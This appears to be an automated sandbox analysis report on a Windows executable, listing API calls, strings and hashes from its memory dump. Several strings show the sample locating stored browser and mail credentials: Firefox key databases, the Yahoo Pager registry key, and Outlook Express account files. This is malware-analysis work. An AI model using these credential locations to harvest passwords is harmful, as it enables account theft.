                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                          • String ID: sysdatetimepick32
                                          • API String ID: 3411445237-4169760276
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$DialogMessageSend
                                          • String ID:
                                          • API String ID: 2485852401-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                          • DeleteObject.GDI32(?), ref: 0040B202
                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: C@$key3.db$key4.db
                                          • API String ID: 581844971-2841947474
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClient
                                          • String ID:
                                          • API String ID: 2126104762-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                          • GetDC.USER32(00000000), ref: 0040708A
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 1999381814-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                          • API String ID: 1297977491-3883738016
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpymemset$strlen$_memicmp
                                          • String ID: user_pref("
                                          • API String ID: 765841271-2487180061
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                          • memset.MSVCRT ref: 004058AF
                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                          • SetFocus.USER32(?), ref: 00405965
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                          • _mbscat.MSVCRT ref: 0040A65B
                                          • sprintf.MSVCRT ref: 0040A67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                          • String ID: .8D
                                          • API String ID: 1886237854-2881260426
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • wcslen.MSVCRT ref: 00443559
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                          • strlen.MSVCRT ref: 004435BE
                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                          • memcpy.MSVCRT ref: 004435D8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                          • String ID:
                                          • API String ID: 577244452-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                          • _strcmpi.MSVCRT ref: 004044FA
                                          • _strcmpi.MSVCRT ref: 00404518
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: imap$pop3$smtp
                                          • API String ID: 2025310588-821077329
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00403A78
                                          • memset.MSVCRT ref: 00403A91
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                          • strlen.MSVCRT ref: 00403AD9
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                          • String ID:
                                          • API String ID: 1786725549-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcmp.MSVCRT ref: 00406129
                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                          • memcmp.MSVCRT ref: 00406154
                                          • memcmp.MSVCRT ref: 0040617C
                                          • memcpy.MSVCRT ref: 00406199
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: global-salt$password-check
                                          • API String ID: 231171946-3927197501
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                          • EndPaint.USER32(?,?), ref: 004016F2
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                          • String ID:
                                          • API String ID: 19018683-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32(?), ref: 0040C352
                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DestroyFocusInvalidateRectWindow
                                          • String ID: XgD$rY@
                                          • API String ID: 3502187192-1347721759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00406376
                                          • memcpy.MSVCRT ref: 00406389
                                          • memcpy.MSVCRT ref: 0040639C
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                          • memcpy.MSVCRT ref: 004063E0
                                          • memcpy.MSVCRT ref: 004063F3
                                          • memcpy.MSVCRT ref: 00406420
                                          • memcpy.MSVCRT ref: 00406435
                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                          • memset.MSVCRT ref: 004032FD
                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                          • strchr.MSVCRT ref: 0040334C
                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                          • strlen.MSVCRT ref: 0040338E
                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                          • String ID: Personalities
                                          • API String ID: 2103853322-4287407858
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                          • memcpy.MSVCRT ref: 00410238
                                          Strings
                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                          • API String ID: 2859077140-3316789007
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00443A57
                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00409031
                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                          • _mbscpy.MSVCRT ref: 0040906D
                                          Strings
                                          • {?@ UD, xrefs: 0040900D
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                          • API String ID: 408644273-2682877464
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405E9E,00000000), ref: 00410912
                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: SHAutoComplete$shlwapi.dll
                                          • API String ID: 145871493-1506664499
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID: $no query solution
                                          • API String ID: 368790112-326442043
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          • API String ID: 3510742995-272990098
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset
                                          • String ID: H
                                          • API String ID: 2221118986-2852464175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 231171946-3708268960
                                          • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                          • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                          • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                          • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                          • memset.MSVCRT ref: 0040A8F8
                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                          • sprintf.MSVCRT ref: 0040A93D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 3337535707-2769808009
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID:
                                          • API String ID: 125969286-0
                                          • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                          • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                          • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                          • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                          • String ID:
                                          • API String ID: 2374668499-0
                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040AAB7
                                          • memset.MSVCRT ref: 0040AACD
                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                          • sprintf.MSVCRT ref: 0040AB04
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                          • <%s>, xrefs: 0040AAFE
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3699762281-1998499579
                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                          • Opcode Fuzzy Hash: f6a7cb9cab936f08d15dd8d23444ed7b17806203963db2ce2ba1a06719781879
                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 02bd71189ddcce43ee684b345b6da2237f54ddd92cd3481cc251e08af4b36a79
                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                          • Opcode Fuzzy Hash: 02bd71189ddcce43ee684b345b6da2237f54ddd92cd3481cc251e08af4b36a79
                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
